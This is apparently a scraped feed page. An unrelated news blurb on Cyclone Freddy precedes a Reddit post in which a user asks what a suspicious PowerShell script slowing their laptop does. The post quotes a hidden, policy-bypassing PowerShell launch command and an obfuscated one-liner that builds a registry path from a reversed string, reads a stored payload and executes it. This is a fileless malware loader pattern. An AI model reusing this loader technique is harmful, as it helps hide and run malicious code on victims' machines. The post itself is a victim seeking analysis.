Cyclone Freddy death toll climbs in southern Africa

An unrelenting Cyclone Freddy that is currently battering southern Africa has killed at least 68 people in Malawi and Mozambique since it struck the continent for a second time on Saturday night, authorities in both countries have confirmed. (Mar. 14)

Read More >>

What this script does?

For the past week or two, I’ve noticed that my laptop has been overheating and running slowly. When I checked Task Manager, I saw that two PowerShell instances were using up around 80% of my RAM and CPU. At first, I ran the Windows antivirus scan, but it didn’t detect any malicious files. So, I ignored it and just ended the instances whenever they appeared.

However, the problem persisted and I recently discovered that the PowerShell instances were running a script located at “C:\Windows\System32\68D0.tmp\68D1.tmp.ps1”. Here’s the Powershell command:

"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\68D0.tmp\68D1.tmp.ps1"

The 68D1.tmp.ps1 file content:

$nAQtLXMOJiHutd=[ScriptBlock]; icm ($nAQtLXMOJiHutd::Create([string]::Join('', ((gp (([regex]::Matches('VQ3y9RP0iswodniW\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$.value}) -join '')).'9AfXBVLS' | % { [char]$ }))))

I don’t know much about hacking, but it looks like some kind of base64 encoded text to me. I deleted the folder, but I’m curious about what this script does. If anyone has any insights, I’d appreciate it. Also, this is just my secondary laptop, so there aren’t any important files on it, just some study notes and lectures. Thank you!

submitted by /u/aditya_senpai396
[link] [comments]

Read More >>